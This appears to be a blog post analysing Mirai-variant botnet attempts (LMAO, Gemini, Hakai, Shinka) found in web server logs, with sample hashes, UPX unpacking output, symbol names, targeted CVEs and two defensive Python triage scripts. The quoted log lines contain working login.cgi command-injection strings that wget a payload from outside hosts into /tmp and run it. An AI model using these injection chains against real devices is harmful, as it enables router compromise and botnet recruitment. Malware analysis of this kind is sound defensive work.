Mirai variants botnets | Joachim De Zutter
August 2018

Exploit attempts in log files:
156.194.137.27 - - [13/Aug/2018:21:33:24 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
[...]
41.36.80.31 - - [15/Aug/2018:17:45:31 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://80.211.67.245/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" 400 0 "-" "LMAO/2.0"
File name: k
File size: 294
MD5: 063ca53f7a8a265baab30624b37b7220
SHA1: 63a7caf49c8d6771d6947c313c24b017c22e71e3
SHA256: 8c8b8f69fb7f37b9c4dc0f1c448be5104bc0cc75b99289e56dc2d88dcf252d80
https://www.virustotal.com/#/file/8c8b8f69fb7f37b9c4dc0f1c448be5104bc0cc75b99289e56dc2d88dcf252d80

File name: arm
File size: 30472
MD5: bbf936893b0e24963d69d0a6713e2110
SHA1: 85acfe2fb0fd8ce2e6f011af42f0b6633199372e
SHA256: d902cda3e4fb4a64eb990b78b6fb1730d90a267ae4c4d2c27ec58bfa5c231c41
https://www.virustotal.com/#/file/d902cda3e4fb4a64eb990b78b6fb1730d90a267ae4c4d2c27ec58bfa5c231c41

File name: arm7
File size: 49068
MD5: 9df0fd7abb2c3f66c4c2a16ecf18b632
SHA1: aa89aa6888bd77ccfb54ca86d9d42f718ad3598a
SHA256: 1874bbdc0c14c94b02df3b8d88ce4476cd1d2bb5330c7af69a3c5dfbeefd4cc2
https://www.virustotal.com/#/file/1874bbdc0c14c94b02df3b8d88ce4476cd1d2bb5330c7af69a3c5dfbeefd4cc2

File name: mips
File size: 30924
MD5: adea9e4cd264d8d9a18902be5446a5c1
SHA1: 7bcfe2250839fabb0faf883ff41ac02240dfb396
SHA256: 0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c
https://www.virustotal.com/#/file/0e344513a62220fcfe0ffebf9b722980eb74a155ff2c86e109311f7e3fe7375c

File name: mipsel
File size: 31848
MD5: 3da4c38d528ed7e1536bc1bcb6df0909
SHA1: 68621923b159ca1d01f90d5538910b5c96fbf199
SHA256: 15dd7db40dfe2cf876ced79c6154044cdee9cd0c9f4ef6d2bfd93b58dbd5a424
https://www.virustotal.com/#/file/15dd7db40dfe2cf876ced79c6154044cdee9cd0c9f4ef6d2bfd93b58dbd5a424

File name: x86_32
File size: 24764
MD5: 172eb85780bb0666b637a91905428651
SHA1: 15f67d7a6143f2891dd0c5c9f6fa32d3fe1044ae
SHA256: 544fc2d51b9c226faeef0828d77e63188f5b818af0d0f26195fff4b508f865d1
https://www.virustotal.com/#/file/544fc2d51b9c226faeef0828d77e63188f5b818af0d0f26195fff4b508f865d1

File name: x86_64
File size: 26232
MD5: d4e28149c301d3545c1e970b3d2c2f07
SHA1: c336672c6937df11902b4354253f54b8fe277d71
SHA256: 65ea5c63bebae33cc3b508c3922584111fc50152cbe53309fd30fe3825e81817
https://www.virustotal.com/#/file/65ea5c63bebae33cc3b508c3922584111fc50152cbe53309fd30fe3825e81817
Exploit attempt in log files:
31.163.60.8 - - [21/Aug/2018:10:00:16 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Gemini/2.0"
File name: d
File size: 237
MD5: 477f3614d7126d3074b982ecf08f8617
SHA1: 4edd85ad7b7ee3da7c7b2454c95ae6aa29270751
SHA256: dbc71be7eb1197c3c95c6094a33fa3e8c7bdde7725d77fd8526619ce9be10050
https://www.virustotal.com/#/file/dbc71be7eb1197c3c95c6094a33fa3e8c7bdde7725d77fd8526619ce9be10050

File name: .shinka.mips
File size: 26220
MD5: e09d2aac243fc7341106242cbf11f92c
SHA1: 7692d6f79cca2d052d685e77b9c52d9afdfe6cda
SHA256: e64051a6405ddc840981ccf0d014bd8dbefbc549c0d6f1cad9362fe9f2ee1634
https://www.virustotal.com/#/file/e64051a6405ddc840981ccf0d014bd8dbefbc549c0d6f1cad9362fe9f2ee1634

File name: .shinka.mpsl
File size: 26860
MD5: 2868cfcc540c82fa40051cb24db4a652
SHA1: 68a16162f9b13aa3c0ad0d68f48528409b74c30c
SHA256: 44b4957477852679e355d7b84f23b186240090417777304f9160a9e156e1f3f2
https://www.virustotal.com/#/file/44b4957477852679e355d7b84f23b186240090417777304f9160a9e156e1f3f2
$ upx -d .shinka.mips 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     83236 <-     26220   31.50%  linux/mipseb   .shinka.mips

Unpacked 1 file.
$ upx -d .shinka.mpsl
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     81816 <-     26860   32.83%  linux/mipsel   .shinka.mpsl

Unpacked 1 file.
File name: .shinka.mips
File size: 80964
MD5: 222a4046bf07711849d86caa4034bf81
SHA1: e33301687ddc5ce8e32818ee9b460558d5a784b6
SHA256: 65209b23d305b77b3ba3ad50de4e2405b6e808042c6d799b3c6495d6b369cbff

File name: .shinka.mpsl
File size: 80968
MD5: 24cdb09ad79555bd44a550ea10761d5d
SHA1: 1fe67916860f18ceabb848eeb22b34cad70d48dc
SHA256: f122033259702a8d4919379eaf1ec1fb522e0db28cb9781a19bce184ca5c59c2
Exploit attempts in log files:
41.184.234.53 - - [20/Aug/2018:22:32:14 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
41.184.234.53 - - [20/Aug/2018:22:32:15 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
156.201.242.158 - - [21/Aug/2018:05:02:54 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
...
156.201.242.158 - - [21/Aug/2018:05:03:25 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
42.118.146.128 - - [22/Aug/2018:08:19:33 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
42.118.146.128 - - [22/Aug/2018:08:19:35 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
42.117.104.29 - - [22/Aug/2018:09:42:49 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
1.52.210.213 - - [22/Aug/2018:09:45:33 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
156.220.125.174 - - [22/Aug/2018:22:47:20 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
...
156.220.125.174 - - [22/Aug/2018:22:47:55 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://176.32.32.156/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" 400 0 "-" "Hakai/2.0"
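Every log excerpt on this page carries the same injection: a quote that breaks out of the cli parameter of /login.cgi, a chain of ;-separated commands, and a closing quote, all URL-encoded in the query string. The script below is an added example (not part of the original post and not code from any of the botnets discussed): it parses combined-format log lines, URL-decodes the query, recognises the quote-break in cli=, and pulls out the payload URL, the drop path under /tmp, the command chain and the User-Agent, so that each attempt yields the indicators the post lists after each excerpt. The log lines embedded in it are constructed, with addresses from documentation ranges, and the function names are the example's own.

```python
"""Triage of /login.cgi?cli= command-injection attempts in combined-format web logs."""
import re
from urllib.parse import unquote

# Constructed sample lines modelled on the entries quoted on this page; the addresses
# are from documentation ranges, not the real sources.
SAMPLE_LOG = (
    '198.51.100.23 - - [20/Aug/2018:22:32:14 +0300] "GET /login.cgi?cli=aa%20aa%27;'
    'wget%20http://203.0.113.10/bin%20-O%20-%3E%20/tmp/hk;sh%20/tmp/hk%27$ HTTP/1.1" '
    '400 0 "-" "Hakai/2.0"\n'
    '198.51.100.44 - - [13/Aug/2018:21:33:24 +0300] "GET /login.cgi?cli=aa%20aa%27;'
    'wget%20http://203.0.113.10/k%20-O%20/tmp/ks;chmod%20777%20/tmp/ks;sh%20/tmp/ks%27$ HTTP/1.1" '
    '400 0 "-" "LMAO/2.0"\n'
    '198.51.100.7 - - [20/Aug/2018:22:40:01 +0300] "GET /login.cgi?cli=admin HTTP/1.1" '
    '404 0 "-" "Mozilla/5.0"\n'
)

# Combined log format: client, ident, user, [timestamp], "request", status, size, "referer", "ua".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# After URL-decoding, the injected cli value has the shape:  aa aa';<commands>'$
INJECTED_CLI = re.compile(r"^cli=[^']*'\s*;(?P<cmds>.*)'\$?$", re.S)
URL_RE = re.compile(r"https?://[^\s;'\"]+")
DROP_RE = re.compile(r"/tmp/\.?[\w.-]+")


def parse_line(line):
    """Return the combined-log fields of one line, or None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def extract_injection(line):
    """Return IOCs for a /login.cgi?cli= injection attempt, or None for any other request."""
    rec = parse_line(line)
    if rec is None:
        return None
    path, _, query = rec["target"].partition("?")
    if path != "/login.cgi":
        return None
    decoded = unquote(query)
    inj = INJECTED_CLI.match(decoded)
    if inj is None:
        return None  # a cli= value without the quote-break is a normal login, not this exploit
    cmds = [c.strip() for c in inj["cmds"].split(";") if c.strip()]
    urls = URL_RE.findall(inj["cmds"])
    drops = DROP_RE.findall(inj["cmds"])
    return {
        "src": rec["ip"],
        "ts": rec["ts"],
        "ua": rec["ua"],
        "status": int(rec["status"]),
        "commands": cmds,
        "payload_url": urls[0] if urls else None,
        "drop_path": drops[0] if drops else None,
    }


def scan_log(text):
    """Run extract_injection over every line of a log and return the hits in order."""
    hits = []
    for line in text.splitlines():
        ioc = extract_injection(line)
        if ioc:
            hits.append(ioc)
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        print(f"{h['ts']} {h['src']} ua={h['ua']!r} url={h['payload_url']} drop={h['drop_path']}")
        print("   commands:", " | ".join(h["commands"]))
```

Two details stand out once the decoded command chain is printed. The LMAO variant saves the dropper with wget -O /tmp/ks and therefore needs chmod 777 before running it, whereas the Gemini, Hakai and Shinka requests write wget's standard output through a shell redirection (-O - > /tmp/hk, which the URL-encoding shows as -O%20-%3E%20/tmp/hk) and skip the chmod, because the file is handed to sh rather than executed directly. The 400 status on this server means the request never reached a CGI handler; on a vulnerable device the same request runs the whole chain.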
File name: bin
File size: 73800
MD5: 5ab32bdead9a6043f0db9ab7809be4f1
SHA1: 76ae22c4b87534397f50d62d4481e57c02e563c1
SHA256: fa588bdc625f5103d4960f5905a9b314a78de8dd35eccdf3e62ca52963148ee3
bin is an ELF binary for MIPS. It is clearly based on the leaked Mirai source code: the binary was not stripped, so it still contains variable names and at least the following function names:
checksum_generic
checksum_tcpudp
dlinkscanner_scanner_init
watchdog_maintain
recvLine
sockprintf
szprintf
connectTimeout
initConnection
getOurIP
udpfl00d
stdfl00d
httphex
tcpFl00d
processCmd
main
hnapscanner_scanner_init
huaweiscanner_scanner_init
killer_kill_by_port
killer_init
rand_next
rand_init
realtekscanner_scanner_init
table_retrieve_val
table_lock_val
table_unlock_val
table_init
scanner_init
util_strlen
util_strcpy
util_memcpy
util_zero
util_memsearch
util_atoi
util_fdgets
util_local_addr
util_stristr
util_itoa
The realtekscanner_scanner_init code scans for devices vulnerable to CVE-2014-8361 (command injection through the miniigd UPnP SOAP service of the Realtek SDK).
The hnapscanner_scanner_init code scans for devices vulnerable to CVE-2015-2051 (command injection through the HNAP interface of D-Link routers).
The dlinkscanner_scanner_init code scans for devices vulnerable to the D-Link DSL-2750B login.cgi command injection, the same /login.cgi?cli= request that appears in the log excerpts on this page.
The huaweiscanner_scanner_init code scans for devices vulnerable to CVE-2017-17215 (command injection through the UPnP service of the Huawei HG532 router).

Exploit attempts in log files:
80.13.255.108 - - [23/Aug/2018:12:25:55 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Shinka/1.0"
80.13.255.108 - - [23/Aug/2018:12:25:56 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Shinka/1.0"
80.13.255.108 - - [23/Aug/2018:12:25:59 +0300] "GET /login.cgi?cli=aa%20aa%27;wget%20http://209.141.33.86/d%20-O%20-%3E%20/tmp/.shinka;sh%20/tmp/.shinka%27$ HTTP/1.1" 400 0 "-" "Shinka/1.0"
File name: .shinka.mips
File size: 26220
MD5: 247422a5e57b9032ba228d3d21f14bf5
SHA1: 84468d38f5bb82836e8066d9d3948c13f9c8e45d
SHA256: 00ad20514054639bc5337d9bf673fd875aa5bacd702ce21af760b8cbb9939009
https://www.virustotal.com/#/file/00ad20514054639bc5337d9bf673fd875aa5bacd702ce21af760b8cbb9939009

File name: .shinka.mpsl
File size: 26860
MD5: 340804540c9669dc2575139a43880c3a
SHA1: ac248db8dd8cd8d2682be0bd86e0e54f830c3d7d
SHA256: 9c6c4016b3ab1f50edb12291259d96f9bf6a7ccd3cfa7608dd5ac0dd62e1c719
https://www.virustotal.com/#/file/9c6c4016b3ab1f50edb12291259d96f9bf6a7ccd3cfa7608dd5ac0dd62e1c719
$ upx -d .shinka.mips 
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     83236 <-     26220   31.50%  linux/mipseb   .shinka.mips

Unpacked 1 file.
$ upx -d .shinka.mpsl
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2013
UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
     81816 <-     26860   32.83%  linux/mipsel   .shinka.mpsl

Unpacked 1 file.
The only difference between these unpacked .shinka.mips and .shinka.mpsl binaries and the versions analysed above appears to be the User-Agent string, which changed from Gemini/2.0 to Shinka/1.0.
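The hash lists, the upx -d runs and the symbol names above are the three checks the post applies to each dropped binary. As an added example (not the author's tooling and not code from the malware), the following script performs the same triage on a file in one pass: it reads the ELF identification bytes to report word size, byte order and machine (so mips versus mipsel is decided from the header rather than from the file name the dropper used), looks for the UPX! marker, searches for the Mirai function names listed above, and computes MD5, SHA-1 and SHA-256. The two inputs it runs on are constructed fixtures, a bare ELF header prefix followed by filler bytes, not the samples from this page; MIRAI_SYMBOLS, make_elf and triage are the example's own names.

```python
"""Header, packer, symbol and hash triage for ELF samples (added example)."""
import hashlib
import struct

# e_machine values from the ELF specification for the architectures seen on this page.
E_MACHINE = {3: "x86", 8: "mips", 40: "arm", 62: "x86_64"}

# Function names from the leaked Mirai source that the post found in bin (example's own list).
MIRAI_SYMBOLS = [
    b"table_retrieve_val", b"table_lock_val", b"table_unlock_val", b"table_init",
    b"killer_init", b"killer_kill_by_port", b"scanner_init", b"rand_next", b"rand_init",
    b"util_memsearch", b"util_stristr", b"util_fdgets", b"util_local_addr",
]


def elf_header(data):
    """Return (bits, byte order, machine) from the ELF ident and e_machine, or None if not ELF."""
    if len(data) < 20 or data[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(data[4])            # EI_CLASS
    order = {1: "little", 2: "big"}.get(data[5])   # EI_DATA
    if bits is None or order is None:
        return None
    # e_machine sits at offset 18 in both ELF32 and ELF64 and is stored in the file's own byte order.
    (machine,) = struct.unpack_from("<H" if order == "little" else ">H", data, 18)
    return bits, order, E_MACHINE.get(machine, "unknown(%d)" % machine)


def upx_packed(data):
    """True if the UPX marker is present. A hint only: the magic bytes can be overwritten."""
    return b"UPX!" in data


def mirai_symbols(data):
    """Names from MIRAI_SYMBOLS that occur verbatim in the file (only works on unstripped binaries)."""
    return [s.decode() for s in MIRAI_SYMBOLS if s in data]


def hashes(data):
    """The three digests the post records for every sample."""
    return {n: hashlib.new(n, data).hexdigest() for n in ("md5", "sha1", "sha256")}


def triage(data):
    """Collect everything the post records per sample into one dict."""
    info = {"size": len(data), "elf": elf_header(data), "upx": upx_packed(data),
            "mirai_symbols": mirai_symbols(data)}
    info.update(hashes(data))
    return info


def make_elf(bits, order, machine, body):
    """Constructed fixture: a 24-byte ELF header prefix (ident, e_type, e_machine, e_version)
    followed by arbitrary bytes. Not a loadable binary; enough for the header checks above."""
    ident = (b"\x7fELF" + bytes([1 if bits == 32 else 2, 1 if order == "little" else 2, 1])
             + b"\0" * 9)
    fmt = ("<" if order == "little" else ">") + "HHI"
    return ident + struct.pack(fmt, 2, machine, 1) + body   # ET_EXEC, machine, EV_CURRENT


# Two constructed samples: a "packed" big-endian MIPS file and an "unstripped" little-endian one.
SAMPLE_PACKED = make_elf(32, "big", 8, b"\0" * 32 + b"UPX!" + b"\0" * 64)
SAMPLE_UNSTRIPPED = make_elf(32, "little", 8,
                             b"\0" * 16 + b"\0".join([b"killer_init", b"scanner_init",
                                                      b"table_retrieve_val"]) + b"\0")

if __name__ == "__main__":
    for name, blob in (("packed", SAMPLE_PACKED), ("unstripped", SAMPLE_UNSTRIPPED)):
        t = triage(blob)
        print(name, t["elf"], "upx=%s" % t["upx"], t["mirai_symbols"], t["sha256"][:16])
```

Two caveats apply. The UPX! check is a hint, not proof: Mirai builds are known to overwrite the UPX magic so that a stock upx -d refuses the file, and the packer then has to be recognised from the decompression stub at the entry point instead. And matching symbol names only works on unstripped binaries such as bin above; for the packed .shinka samples the names become visible only after unpacking, which is why the post hashes both the packed and the unpacked files.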